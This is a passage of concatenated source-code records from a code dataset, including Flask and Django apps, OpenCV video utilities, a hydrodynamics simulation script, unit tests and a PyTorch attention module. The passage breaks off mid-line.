models.Classifications(name=name, parent=parent)\n db.session.add(classification)\n db.session.commit()\n return redirect(url_for('configure.chart_of_accounts'))\n\n@configure_blueprint.route('/ChartOfAccounts/DeleteClassification/')\ndef delete_classification(classification):\n classification = models.Classifications \\\n .query \\\n .filter_by(name=classification) \\\n .first()\n db.session.delete(classification)\n db.session.commit()\n return redirect(url_for('configure.chart_of_accounts'))\n\n@configure_blueprint.route('/ChartOfAccounts/AddAccount', methods=['POST','GET'])\ndef add_account():\n if request.method == 'POST':\n form = request.form.copy().to_dict()\n name = form['account']\n parent = form['accountparent']\n parent = models.Classifications \\\n .query \\\n .filter_by(id=parent) \\\n .one()\n parent = parent.name\n account = models.Accounts(name=name, parent=parent)\n db.session.add(account)\n db.session.commit()\n return redirect(url_for('configure.chart_of_accounts'))\n\n@configure_blueprint.route('/ChartOfAccounts/DeleteAccount/')\ndef delete_account(account):\n account = models.Accounts.query.filter_by(name=account).first()\n db.session.delete(account)\n db.session.commit()\n return redirect(url_for('configure.chart_of_accounts'))\n\n@configure_blueprint.route('/ChartOfAccounts/AddSubAccount', methods=['POST','GET'])\ndef add_subaccount():\n if request.method == 'POST':\n form = request.form.copy().to_dict()\n name = form['subaccount']\n parent = form['subaccountparent']\n parent = models.Accounts.query.filter_by(id=parent).one()\n parent = parent.name\n subaccount = models.Subaccounts(name=name, parent=parent)\n db.session.add(subaccount)\n db.session.commit()\n return redirect(url_for('configure.chart_of_accounts'))\n\n@configure_blueprint.route('/ChartOfAccounts/DeleteSubAccount/')\ndef delete_subaccount(subaccount):\n subaccount = models.Accounts.query.filter_by(name=subaccount).first()\n db.session.delete(subaccount)\n db.session.commit()\n return redirect(url_for('configure.chart_of_accounts'))\n","sub_path":"pacioli/configure/configure.py","file_name":"configure.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"61248895","text":"from PIL import Image, ImagePalette\nimport cv2\nimport numpy as np\nimport pathlib\nfrom itertools import combinations\n\n\ndef get_parent_dir_path() -> str:\n return pathlib.Path(__file__).parent.parent.absolute()\n\n\ndef sort_points(points):\n center = np.mean(points, axis=0)\n\n tl_cond = np.logical_and(points[:, 0] <= center[0], points[:, 1] <= center[1])\n tl = points[tl_cond]\n tr_cond = np.logical_and(points[:, 0] > center[0], points[:, 1] <= center[1])\n tr = points[tr_cond]\n br_cond = np.logical_and(points[:, 0] > center[0], points[:, 1] > center[1])\n br = points[br_cond]\n bl_cond = np.logical_and(points[:, 0] <= center[0], points[:, 1] > center[1])\n bl = points[bl_cond]\n\n return np.vstack([tl, tr, br, bl])\n\n\ndef get_4points_with_highest_area(points):\n if len(points) < 4:\n return []\n\n if len(points) == 4:\n return points\n\n max_combination = []\n max_area = 0\n\n for i in combinations(points, 4):\n area = cv2.contourArea(np.array(i))\n\n if max_area < area:\n max_combination = i\n max_area = area\n\n return max_combination\n\ndef is_shape_inside_shape(shape1, shape2):\n for point in shape1:\n if cv2.pointPolygonTest(np.array(shape2), tuple(point), False) < 0:\n return False\n\n return True\n\nclass BBObject:\n points = []\n center = ()\n\n def __init__(self, points):\n self.center = get_center(points)\n self.points = points\n self.original_points = points\n\n def set_points(self, points):\n self.points = points\n self.center = get_center(points)\n\n def get_points(self):\n return self.points\n\n# it returns list of numpy arrays with object coordinates\n# One object has 4 points, every point has two coordinates\ndef get_object_coordinates(segment_frame):\n contours, _ = cv2.findContours(cv2.cvtColor(segment_frame, cv2.COLOR_RGB2GRAY)[:, :].astype(np.uint8), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n result = []\n\n def getApprox(contour, alpha):\n epsilon = alpha * cv2.arcLength(contour, True)\n approx = cv2.approxPolyDP(contour, epsilon, True)\n return approx\n\n for contour in contours:\n corner_points = getApprox(contour, 0.01)\n points = np.float32(list(map(lambda x: x[0], corner_points)))\n\n try:\n for point in points:\n cv2.circle(segment_frame, tuple(point), 20, (255, 150, 20), 10)\n except:\n pass\n\n points = get_4points_with_highest_area(points)\n points = sort_points(np.array(points))\n\n if len(points) == 4:\n result.append(points)\n\n for comb in combinations(list(range(len(result))), 2) :\n shape1 = result[comb[0]]\n shape2 = result[comb[1]]\n\n if len(shape1) == 0 or len(shape2) == 0:\n continue\n\n if is_shape_inside_shape(shape1, shape2):\n result[comb[0]] = []\n elif is_shape_inside_shape(shape2, shape1):\n result[comb[1]] = []\n\n final_result = []\n\n for i in result:\n if len(i) > 0:\n final_result.append(BBObject(i))\n\n return final_result\n\n\ndef optimize_keypoint(src, src_prev, kp=None, match_count=None):\n match_count = match_count or 20\n detector = cv2.ORB_create()\n print(\"detector\")\n # Detect the keypoints using ORB Detector, compute the descriptors\n src_kp, des1 = detector.detectAndCompute(src, None)\n prev_kp, des2 = detector.detectAndCompute(src_prev, None)\n # print('k, d', kp1, des1)\n # if kp:\n # kp2, des2 = kp.get(\"kp\"), kp.get(\"des\")\n # src_kp, prev_kp = kp.get(\"src\"), kp.get(\"previous\")\n matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n # matcher = cv2.DescriptorMatcher_create(cv2.DescriptorMatcher_FLANNBASED)\n # matches = matcher.knnMatch(des1, des2, 2)\n matches = matcher.match(des1, des2)\n print(len(matches))\n # matcher = cv2.BFMatcher()\n # matches = matcher.match(src_kp, trans_kp)\n\n # # -- Filter matches using the Lowe's ratio test\n # ratio_thresh = 0.7\n # good_matches = []\n # for m, n in matches:\n # if m.distance < ratio_thresh * n.distance:\n # good_matches.append(m)\n # -- Draw matches\n img_matches = np.empty((max(src.shape[0], src_prev.shape[0]), src.shape[1] + src_prev.shape[1], 3), dtype=np.uint8)\n # final_img = cv2.drawMatches(src, src_kp, src_prev, prev_kp, good_matches, img_matches,\n # flags=cv2.DrawMatchesFlags_NOT_DRAW_SINGLE_POINTS)\n\n final_img = cv2.drawMatches(src, src_kp, src_prev, prev_kp, matches[:match_count], img_matches)\n\n return final_img\n\n\ndef stabilise_transformation(src, src_prev):\n brows, bcols = src_prev.shape[:2]\n dst = cv2.addWeighted(src, 0.3, src_prev, 0.7, 0)\n rows, cols, channels = src.shape\n src[int(brows / 2) - int(rows / 2):int(brows / 2) + int(rows / 2),\n int(bcols / 2) - int(cols / 2):int(bcols / 2) + int(cols / 2)] = dst\n cv2.normalize(src, dst, 0, 1, cv2.NORM_L1, -1)\n return src\n\n\ndef generate_result_frame(frame, frame_index, replacement, objects):\n target_height, target_width, _ = replacement.shape\n\n counter = 0\n for global_obj_index in objects:\n global_obj = objects[global_obj_index]\n coords = global_obj.get_frame_coords(frame_index)\n if coords is None:\n continue\n\n original_coordinates = sort_points(np.array([[0, 0], [target_width, 0], [target_width, target_height], [0, target_height]], np.float32))\n object = sort_points(np.array(coords.points, np.float32))\n\n transformation = cv2.getPerspectiveTransform(original_coordinates, object)\n\n transformed = cv2.warpPerspective(replacement, transformation, (frame.shape[1], frame.shape[0]))\n transformed = enhance_colors(frame, transformed)\n\n cv2.fillConvexPoly(frame, sort_points(object.astype(int)), 0, 16)\n\n frame = frame + transformed\n\n # DEbug\n # cv2.putText(frame, f'ID{global_obj_index}', tuple(coords.center), cv2.FONT_HERSHEY_SIMPLEX, 1,\n # (0, 255, 255), 2, cv2.LINE_AA, False)\n #\n # for i in coords.points:\n # cv2.circle(frame, tuple(i), 10, (0, 0, 0), 6)\n #\n # if global_obj.get_frame_coords(frame_index-1) is not None:\n # for i in global_obj.get_frame_coords(frame_index-1).original_points:\n # cv2.circle(frame, tuple(i), 3, (255, 0, 0), 3)\n #\n # for i in coords.original_points:\n # cv2.circle(frame, tuple(i), 5, (0, 255, 0), 3)\n\n # if global_obj.get_frame_coords(frame_index + 1) is not None:\n # for i in global_obj.get_frame_coords(frame_index+1).original_points:\n # cv2.circle(frame, tuple(i), 7, (0, 0, 255), 3)\n # Debug\n\n counter += 1\n\n return frame\n\n\n# Adjust coordinates of objects:\n# position correcation, smoothing\ndef adjust_coordinates(object_coordinates) -> np.ndarray:\n return object_coordinates\n\n\ndef enhance_colors(parent, injection):\n # aug = Compose([FDA([parent], p=1, read_fn=lambda x: x)])\n # result = aug(image=injection)['image']\n #\n # cv2.imshow('img', result)\n return injection\n\n\ndef get_center(points):\n return np.mean(np.array(points), axis=0)\n\ndef blur_transformed(src, kernel=(4, 4), transformation=None, with_edge=False):\n # Create ROI coordinates\n # x, y = 0, 0\n # w, h = int(src.shape[1]), int(src.shape[0])\n # blur_gaus = cv2.GaussianBlur(cv2.rectangle(src, (1, 1), (src.shape[1]-1, src.shape[0]-1), (150, 150, 150), 2), (9, 9), 0)\n #\n # # Insert ROI back into image\n # src[y:y + h, x:x + w] = blur\n #\n if with_edge:\n cv2.rectangle(src, (1, 1), (src.shape[1]-1, src.shape[0]-1), (150, 150, 150), 2)\n blur = cv2.filter2D(src, -1, np.ones(kernel, np.float32) / 18)\n return blur\n","sub_path":"cvas/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"181304152","text":"\"\"\"\nQuestion 019 - Level 03\nYou are required to write a program to sort the (name, age, height) tuples by ascending where name is string, age and\nheight are numbers. The tuples are input by console. The sort criteria is:\n1. Sort based on name;\n2. Then sort based on age;\n3. Then sort by score.\nThe priority is that name > age > score.\nIf the following tuples are given as input to program:\nTom,18,80\nJohn,20,90\nJony,17,91\nJony,17,93\nJson,21,85\nThen, the output of the program should be:\n[('John', '20, '90'), ('Jony', '17', '91'), ('Jony', '17', '93'), ('Json', '21', '85'), ('Tom', '19', '80')]\nHints: In case of input data being supplied to the question, it should be assumed to be a console input.\nWe use itemgetter to enable multiple sort keys.\n--- Nguyen Van Duc ---\n\"\"\"\nfrom operator import itemgetter, attrgetter\n\nl = []\nwhile True:\n s = input(\"Enter values: \")\n if not s:\n break\n l.append(tuple(s.split(\",\")))\n\nl.sort(key=itemgetter(0, 1, 2))\nprint(l)\n","sub_path":"101 Tasks/Task 019.py","file_name":"Task 019.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"16179631","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom phonenumber_field.modelfields import PhoneNumberField\n\n# from projecten.models import Verkoopkans\n\n\"\"\"\nAbstracte class voor het toevoegen van time stamp op de modellen.\n\"\"\"\nclass TransactionDT(models.Model):\n \"\"\"\n Opnemen in (vrijwel) iedere class.\n \"\"\"\n created_dt = models.DateTimeField(auto_now_add=True, null=True)\n modified_dt = models.DateTimeField(auto_now=True, null=True)\n last_modified_user = models.ForeignKey('auth.User',\n verbose_name='Laatst gewijzigd door',\n null=True,\n blank=True,\n on_delete=models.CASCADE\n )\n\n class Meta:\n abstract = True\n\nclass Branche(TransactionDT):\n branch = models.CharField(max_length=80, unique=True)\n\n class Meta:\n ordering = ['branch']\n verbose_name_plural = 'Branches'\n\n def __unicode__(self):\n return self.branch\n\n def __str__(self):\n return self.branch\n\nclass Relatietype(TransactionDT):\n relatietype = models.CharField(max_length=80, unique=True)\n\n class Meta:\n ordering = ['relatietype']\n verbose_name_plural = 'Relatietypen'\n\n def __unicode__(self):\n return self.relatietype\n\n def __str__(self):\n return self.relatietype\n\nclass Bedrijf(TransactionDT):\n bedrijfsnaam = models.CharField(max_length=120, unique=True)\n telefoonnummer = PhoneNumberField(blank=True, null=True)\n branche = models.ForeignKey(Branche, blank=False, null=False, on_delete=models.CASCADE)\n relatietype = models.ForeignKey(Relatietype, blank=True, null=True, on_delete=models.CASCADE)\n email = models.EmailField(max_length=75, blank=True, null=True)\n website = models.URLField(max_length=200, blank=True, null=True)\n kvk_nummer = models.CharField(max_length=20, blank=True, null=True)\n onenote = models.URLField(max_length=400, blank=True, null=True)\n actief = models.BooleanField(default=True)\n klantpartner = models.ForeignKey(User, verbose_name=\"Relatiemanager\", related_name='Klantpartner', blank=True, null=True, on_delete=models.CASCADE, limit_choices_to={'is_active': True})\n\n class Meta:\n ordering = ['bedrijfsnaam']\n verbose_name_plural = 'Bedrijven'\n\n def __unicode__(self):\n return self.bedrijfsnaam\n\n def __str__(self):\n return self.bedrijfsnaam\n\nclass Adres(TransactionDT):\n ADRESTYPE_CHOICES = (\n ('P', 'Postadres'),\n ('B', 'Bezoekadres')\n )\n\n bedrijf = models.ForeignKey(Bedrijf, blank=True, null=True, on_delete=models.CASCADE)\n adrestype = models.CharField(max_length=1, choices=ADRESTYPE_CHOICES, null=False, blank=False)\n adresregel_1 = models.CharField(max_length=80, null=True)\n adresregel_2 = models.CharField(max_length=80, blank=True, null=True)\n postcode = models.CharField(max_length=7, null=True)\n plaats = models.CharField(max_length=80, null=True)\n Land = models.CharField(max_length=80, blank=True, null=True)\n\n class Meta:\n verbose_name_plural = 'Adressen'\n\n def __unicode__(self):\n return self.adresregel_1 + ', ' + self.postcode + ' ' + self.plaats\n\n def __str__(self):\n return self.adresregel_1 + ', ' + self.postcode + ' ' + self.plaats\n\nclass Contactpersoon(TransactionDT):\n GENDER_CHOICES = (\n ('M', 'Man'),\n ('V', 'Vrouw'),\n ('O', 'Onbekend')\n )\n\n volledige_naam = models.CharField(max_length=120)\n title = models.CharField(verbose_name='titel', max_length=10, blank=True, null=True)\n initialen = models.CharField(max_length=20, blank=True, null=True)\n voornaam = models.CharField(max_length=120, blank=True, null=True)\n tussenvoegsel = models.CharField(max_length=120, blank=True, null=True)\n achternaam = models.CharField(max_length=120, blank=True, null=True)\n telefoonnummer = PhoneNumberField(blank=True, null=True)\n mobielnummer = PhoneNumberField(blank=True, null=True)\n email = models.EmailField(max_length=75, blank=True, null=True)\n bedrijf = models.ForeignKey(Bedrijf, blank=True, null=True, on_delete=models.CASCADE)\n standplaats = models.ForeignKey(Adres, blank=True, null=True, on_delete=models.CASCADE)\n functie = models.CharField(max_length=120, blank=True, null=True)\n afdeling = models.CharField(max_length=120, blank=True, null=True)\n assistent = models.CharField(max_length=120, blank=True, null=True)\n manager = models.CharField(max_length=120, blank=True, null=True)\n overige_contactgegevens = models.CharField(max_length=120, blank=True, null=True)\n onenote = models.URLField(max_length=400, blank=True, null=True)\n nieuwsbrief = models.BooleanField(default=False)\n actief = models.BooleanField(default=True)\n sexe = models.CharField('geslacht', max_length=1, choices=GENDER_CHOICES, default='O', null=False, blank=False)\n klantpartner = models.ForeignKey(User, verbose_name=\"Relatiemanager\", related_name='Relatiemanager', blank=True, null=True, on_delete=models.CASCADE, limit_choices_to={'is_active': True})\n\n class Meta:\n ordering = ['volledige_naam']\n verbose_name_plural = 'Contactpersonen'\n\n def __unicode__(self):\n return self.volledige_naam\n\n def __str__(self):\n return self.volledige_naam \n\n","sub_path":"crm/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"374323091","text":"import phd\nimport numpy as np\n\ndef create_particles(gamma):\n\n Lx = 1. # domain size in x\n nx = 50 # particles per dim\n n = nx*nx*nx # number of points\n\n # create particle container\n pc = phd.ParticleContainer(n, dim=3)\n\n part = 0\n np.random.seed(0)\n for i in range(nx):\n for j in range(nx):\n for k in range(nx):\n pc['position-x'][part] = np.random.rand()\n pc['position-y'][part] = np.random.rand()\n pc['position-z'][part] = np.random.rand()\n pc['ids'][part] = part\n part += 1\n\n # set ambient values\n pc['density'][:] = 1.0 # density\n pc['pressure'][:] = 1.0E-5*(gamma-1) # total energy\n\n # put all enegery in center particle\n r = 0.1\n cells = ( (pc['position-x']-.5)**2\\\n + (pc['position-y']-.5)**2\\\n + (pc['position-z']-.5)**2 ) <= r**2\n pc['pressure'][cells] = 1.0/(4.0*np.pi*r**3/3.)*(gamma-1)\n\n # zero out the velocities and set particle type\n pc['velocity-x'][:] = 0.0\n pc['velocity-y'][:] = 0.0\n pc['velocity-z'][:] = 0.0\n pc['tag'][:] = phd.ParticleTAGS.Real\n pc['type'][:] = phd.ParticleTAGS.Undefined\n\n return pc\n\n# create inital state of the simulation\npc = create_particles(1.4)\n\ndomain = phd.DomainLimits(dim=3, xmin=0., xmax=1.) # spatial size of problem \nboundary = phd.Boundary(domain, # reflective boundary condition\n boundary_type=phd.BoundaryType.Reflective)\nmesh = phd.Mesh(boundary) # tesselation algorithm\nreconstruction = phd.PieceWiseConstant() # constant reconstruction\nriemann = phd.HLL(reconstruction, gamma=1.4) # riemann solver\nintegrator = phd.MovingMesh(pc, mesh, riemann, regularize=1) # integrator \nsolver = phd.Solver(integrator, # simulation driver\n cfl=0.5, tf=0.1, pfreq=1,\n relax_num_iterations=8,\n output_relax=False,\n fname='sedov_3d_uniform')\nsolver.solve()\n","sub_path":"test_suite/sedov/3d/single_core/uniform/sedov_3d_uniform.py","file_name":"sedov_3d_uniform.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"486953846","text":"# -*- coding: utf-8 -*-\n\nfrom django.contrib.contenttypes.models import ContentType\nfrom minke.sessions import CommandFormSession\nfrom minke.sessions import SingleCommandSession\nfrom minke.sessions import CommandChainSession\nfrom minke.sessions import REGISTRY\nfrom minke.models import Host\nfrom .forms import CommandForm\nfrom .models import Command\nfrom .models import CommandGroup\n\n\nclass BaseCommandSession(SingleCommandSession):\n abstract = True\n model = None\n model_id = None\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n obj = self.model.objects.get(pk=self.model_id)\n self.command = obj.cmd\n\n\nclass BaseCommandChainSession(CommandChainSession):\n abstract = True\n model = None\n model_id = None\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n obj = self.model.objects.get(pk=self.model_id)\n self.commands = (c.cmd for c in obj.commands.all())\n\n\nclass BaseCommandChoiceSession(CommandFormSession):\n abstract = True\n form = CommandForm\n model = None\n model_id = None\n\n @classmethod\n def get_form(cls):\n obj = cls.model.objects.get(pk=cls.model_id)\n cmds = obj.get_commands()\n cls.form.base_fields['cmd'].choices = ((c.id, str(c)) for c in cmds)\n return cls.form\n\n def format_cmd(self, cmd):\n cmd_obj = Command.objects.get(pk=self.data['cmd'])\n return super().format_cmd(cmd_obj.cmd)\n\n\ndef session_factory():\n def build_attrs(obj):\n attrs = dict()\n attrs['model'] = obj.__class__\n attrs['model_id'] = obj.id\n attrs['verbose_name'] = obj.label\n attrs['__doc__'] = obj.description\n attrs['work_on'] = tuple((ct.model_class() for ct in obj.minketypes.all()))\n return attrs\n\n objs = Command.objects.filter(active=True)\n for obj in objs:\n attrs = build_attrs(obj)\n attrs['command'] = obj.cmd\n cls_name = '%s_%d' % (Command.__name__, obj.id)\n type(cls_name, (BaseCommandSession,), attrs)\n\n objs = CommandGroup.objects.filter(active=True, as_options=False)\n for obj in objs:\n attrs = build_attrs(obj)\n attrs['commands'] = tuple((c for c in obj.get_commands().all()))\n cls_name = '%s_%d' % (CommandGroup.__name__, obj.id)\n type(cls_name, (BaseCommandChainSession,), attrs)\n\n objs = CommandGroup.objects.filter(active=True, as_options=True)\n for obj in objs:\n attrs = build_attrs(obj)\n cls_name = '%s_%d' % (CommandGroup.__name__, obj.id)\n type(cls_name, (BaseCommandChoiceSession,), attrs)\n\n\nREGISTRY.add_session_factory(session_factory)\n","sub_path":"minke/contrib/commands/sessions.py","file_name":"sessions.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"68065854","text":"\"\"\"Second Migration\n\nRevision ID: 312c8ab46c53\nRevises: c5e23052bcc5\nCreate Date: 2018-09-13 11:36:40.773452\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '312c8ab46c53'\ndown_revision = 'c5e23052bcc5'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('pitches', sa.Column('category', sa.String(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('pitches', 'category')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/312c8ab46c53_second_migration.py","file_name":"312c8ab46c53_second_migration.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"283184812","text":"# encoding: utf-8\n\n\"\"\"\nMIT License\n\nCopyright (c) 2019 BKraujo\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\"\"\"\n\n# Standard Library\nimport logging\nimport inspect\nimport importlib\nfrom inspect import FullArgSpec\nfrom types import FunctionType\nfrom typing import Any\nfrom typing import List\nfrom typing import NoReturn\n\n# 3rd Party Library\n# Current Folder\n# Current Application\n\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_class(klass) -> Any:\n module_name, class_name = klass.rsplit(\".\", 1)\n module = importlib.import_module(module_name)\n return getattr(module, class_name)\n\n\ndef get_instance(klass, *parameters) -> Any:\n return get_class(klass)(*parameters)\n\n\ndef get_attr(module, name) -> Any:\n module = importlib.import_module(module)\n return getattr(module, name)\n\n\ndef list_parameters(method) -> List:\n output = list()\n\n if callable(method):\n spec: FullArgSpec = inspect.getfullargspec(method)\n\n if spec.args:\n for index in range(0, len(spec.args)):\n arg: str = spec.args[index]\n if arg == 'self' or arg == 'cls':\n continue\n\n output.append((arg, spec.annotations[arg]))\n\n return output\n\n\ndef list_methods(source, interface=None) -> List[FunctionType]:\n output: List[FunctionType] = list()\n\n members = __list_public_functions(source)\n if interface:\n\n interface_members = __list_public_functions(interface)\n for im in interface_members:\n for sm in members:\n if sm.__name__ == im.__name__:\n output.append(sm)\n\n else:\n output += members\n\n return output\n\n\ndef __list_public_functions(source) -> List[FunctionType]:\n output: List[FunctionType] = list()\n\n members: List = inspect.getmembers(source)\n for member in members:\n if not member[0].startswith('__') and isinstance(member[1], FunctionType):\n output.append(member[1])\n\n return output\n","sub_path":"src/main/pinnacle/ext/python/generics.py","file_name":"generics.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"91398511","text":"from unittest.mock import MagicMock\nfrom ...generators.file import FileGenerator\nfrom nio.common.block.base import Block\nfrom nio.util.support.block_test_case import NIOBlockTestCase\n\n\nclass SampleFileBlock(FileGenerator, Block):\n pass\n\n\nclass TestFile(NIOBlockTestCase):\n\n def test_random_signals(self):\n blk = SampleFileBlock()\n blk._load_json_file = MagicMock(return_value=[{'a': 'A'}, {'b': 'B'}])\n self.configure_block(blk, {\n \"random_selection\": True\n })\n\n def _test_generate_signals(blk):\n results = list(blk.generate_signals())\n self.assertEqual(len(results), 1)\n try:\n # Check if the signal is the 'A' signal\n self.assertEqual(results[0].a, 'A')\n except:\n # If it's not 'A', then it better be 'B'\n self.assertEqual(results[0].b, 'B')\n\n # test a handful of gerations to check the randomness\n for _ in range(9):\n _test_generate_signals(blk)\n\n def test_sequential_signals(self):\n \"\"\" Make sure we iterate through the list and roll over \"\"\"\n blk = SampleFileBlock()\n blk._load_json_file = MagicMock(return_value=[\n {'a': 'A'}, {'b': 'B'}, {'c': 'C'}])\n self.configure_block(blk, {\n \"random_selection\": False\n })\n\n four_signals = blk.generate_signals(n=4)\n self.assertEqual(len(four_signals), 4)\n self.assertEqual(four_signals[0].a, 'A')\n self.assertEqual(four_signals[1].b, 'B')\n self.assertEqual(four_signals[2].c, 'C')\n self.assertEqual(four_signals[3].a, 'A')\n\n def test_sequential_multiple_signals(self):\n \"\"\" Make sure we iterate through the list and roll over \"\"\"\n blk = SampleFileBlock()\n blk._load_json_file = MagicMock(return_value=[\n {'a': 'A'}, {'b': 'B'}, {'c': 'C'}])\n self.configure_block(blk, {\n \"random_selection\": False\n })\n\n two_signals = blk.generate_signals(n=2)\n three_signals = blk.generate_signals(n=3)\n self.assertEqual(len(two_signals), 2)\n self.assertEqual(len(three_signals), 3)\n self.assertEqual(two_signals[0].a, 'A')\n self.assertEqual(two_signals[1].b, 'B')\n self.assertEqual(three_signals[0].c, 'C')\n self.assertEqual(three_signals[1].a, 'A')\n self.assertEqual(three_signals[2].b, 'B')\n\n def test_load_json_file_bad(self):\n blk = SampleFileBlock()\n with self.assertRaises(Exception):\n self.configure_block(blk, {})\n json_sigs = blk._load_json_file()\n self.assertIsNone(json_sigs)\n\n def test_load_json_file(self):\n blk = SampleFileBlock()\n self.configure_block(blk, {\n 'signals_file': '../tests/generators/signals.json'\n })\n json_sigs = blk._load_json_file()\n self.assertEqual(len(json_sigs), 5)\n","sub_path":"tests/generators/test_file.py","file_name":"test_file.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"632041766","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n# 以下实现仅为 single-batch版本\n# l 代表 local m 代表 conv\nclass Compressed_Attention(nn.Module):\n def __init__(self,name='l',head=4,k_dim=64,d_model=256,p_drop=0.1,compression_rate=4,block_size=64):\n super().__init__()\n self.name = name\n self.head = head\n self.d_model = d_model\n self.k_dim = k_dim\n self.block_size = block_size\n self.multi_head_query = nn.Linear(d_model,d_model)\n self.multi_head_key = nn.Linear(d_model,d_model)\n self.multi_head_value = nn.Linear(d_model,d_model)\n self.output_matrix = nn.Linear(d_model,d_model)\n self.dropout = nn.Dropout(p_drop)\n if name == 'M':\n self.conv = nn.Conv1d(in_channels=d_model,out_channels=d_model,\n kernel_size=compression_rate,stride=compression_rate,groups=head)\n \n def forward(self,src,input_mask=None,use_gpu=True):\n # src (batch_size,seq_len,d_model)\n # 首先判断当前模型是什么\n batch_size = src.size()[0]\n seq_len = src.size()[1]\n if self.name == 'L':\n if input_mask is not None:\n input_mask = input_mask.reshape((batch_size, -1, self.block_size))\n query = self.multi_head_query(src).view(batch_size, seq_len, self.head, -1)\n key = self.multi_head_key(src).view(batch_size, seq_len, self.head, -1)\n value = self.multi_head_value(src).view(batch_size, seq_len, self.head, -1)\n chunk_query = query.reshape(batch_size, -1, self.block_size, self.head, query.size()[-1])\n chunk_key = key.reshape(batch_size,-1,self.block_size,self.head,key.size()[-1])\n chunk_value = value.reshape(batch_size,-1,self.block_size,self.head,value.size()[-1])\n chunk_query = chunk_query.permute(0,3,1,2,4)\n chunk_key = chunk_key.permute(0,3,1,4,2)\n chunk_value = chunk_value.permute(0,3,1,2,4)\n #(batch,head,num,block_size,block_size)\n chunk_qk = chunk_query.matmul(chunk_key)* (self.k_dim ** -0.5)\n if input_mask is not None:\n chunk_qk = chunk_qk.masked_fill(input_mask[:,None,:,None,:],value=-1e10)\n chunk_qk = F.softmax(chunk_qk,dim=-1)\n chunk_qkv = torch.matmul(chunk_qk,chunk_value)\n #(batch,head,seq_len,k_dim)\n qkv = chunk_qkv.contiguous().view(batch_size,self.head,-1,chunk_qkv.size()[-1])\n if self.name =='M':\n multi_query = self.multi_head_query(src)\n multi_key = self.multi_head_key(src)\n multi_value = self.multi_head_value(src)\n # 因为这里含有pad,我们首先缩短 key value 的长度\n if input_mask is not None:\n pad_len = torch.sum(input_mask,dim=-1).item()\n multi_key = multi_key[:,:-pad_len,:]\n multi_value = multi_value[:,:-pad_len,:]\n multi_key = multi_key.transpose(1,2)\n multi_value = multi_value.transpose(1,2)\n #(batch,short_len,d_model)\n after_cnn_multi_key = self.conv(multi_key).transpose(1,2)\n after_cnn_multi_value = self.conv(multi_value).transpose(1,2)\n multi_query = multi_query.view(batch_size,-1,self.head,self.k_dim).permute(0,2,1,3)\n after_cnn_multi_key = after_cnn_multi_key.contiguous().view(batch_size,-1,self.head,self.k_dim).permute(0,2,3,1)\n after_cnn_multi_value = after_cnn_multi_value.contiguous().view(batch_size,-1,self.head,self.k_dim).permute(0,2,1,3)\n global_qk = torch.matmul(multi_query, after_cnn_multi_key)\n global_qk = F.softmax(global_qk,dim=-1)\n #(batch,head,seq_len,k_dim)\n qkv = torch.matmul(global_qk, after_cnn_multi_value)\n # 然后紧接着,\n qkv = qkv.permute(0,2,1,3).contiguous().view(batch_size,seq_len,-1)\n qkv = self.output_matrix(qkv)\n qkv = self.dropout(qkv)\n return 